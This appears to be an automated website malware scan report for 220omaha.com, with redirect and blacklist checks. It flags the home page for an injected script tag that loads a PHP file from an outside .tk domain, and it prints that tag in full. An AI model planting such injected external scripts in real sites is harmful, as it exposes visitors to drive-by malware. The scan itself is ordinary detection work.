Scanned pages/files
Request | Server response | Status |
http://220omaha.com/ | 200 OK Content-Length: 26733 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://comparethewedding.tk/yt-assets/fD98brpH.php?id=16148386"></script> | ||
http://220omaha.com/js/custom.modernizr.js | 200 OK Content-Length: 9288 Content-Type: application/javascript | clean |
http://220omaha.com/scripts/jquery-1.8.0.min.js | 200 OK Content-Length: 92555 Content-Type: application/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js | 200 OK Content-Length: 200719 Content-Type: text/javascript | clean |
http://220omaha.com/scripts/jquery.mousewheel.min.js | 200 OK Content-Length: 1392 Content-Type: application/javascript | clean |
http://220omaha.com/scripts/jquery.mCustomScrollbar.min.js | 200 OK Content-Length: 15942 Content-Type: application/javascript | clean |
http://220omaha.com/scripts/jcarousel.min.js | 200 OK Content-Length: 15649 Content-Type: application/javascript | clean |
http://220omaha.com/scripts/jquery.usquare.js | 200 OK Content-Length: 6490 Content-Type: application/javascript | clean |
http://220omaha.com/forms/js/jquery.min.js | 200 OK Content-Length: 91342 Content-Type: application/javascript | clean |
http://220omaha.com/forms/js/jquery.ba-postmessage.min.js | 200 OK Content-Length: 1074 Content-Type: application/javascript | clean |
http://220omaha.com/forms/js/machform_loader.js | 200 OK Content-Length: 538 Content-Type: application/javascript | clean |
http://220omaha.com/js/jquery.js | 200 OK Content-Length: 290324 Content-Type: application/javascript | clean |
http://220omaha.com/js/bootstrap.min.js | 200 OK Content-Length: 27631 Content-Type: application/javascript | clean |
http://220omaha.com/js/jquery.mixitup.min.js | 200 OK Content-Length: 15958 Content-Type: application/javascript | clean |
http://220omaha.com/js/jquery.easing.js | 200 OK Content-Length: 8097 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 220omaha.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 Jun 2014 12:12:47 GMT
Accept-Ranges: bytes
ETag: "686d-537dd644-3695be35eef8904d"
Server: LiteSpeed
Content-Length: 26733
Content-Type: text/html
Last-Modified: Thu, 22 May 2014 10:49:40 GMT
...26733 bytes of data.
GET / HTTP/1.1
Host: 220omaha.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 Jun 2014 12:12:47 GMT
Accept-Ranges: bytes
ETag: "686d-537dd644-3695be35eef8904d"
Server: LiteSpeed
Content-Length: 26733
Content-Type: text/html
Last-Modified: Thu, 22 May 2014 10:49:40 GMT
...26733 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: 220omaha.com
Referer: http://www.google.com/search?q=220omaha.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 220omaha.com
Referer: http://www.google.com/search?q=220omaha.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=220omaha.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://220omaha.com/
Result: 220omaha.com is not infected or malware details are not published yet.
Result: 220omaha.com is not infected or malware details are not published yet.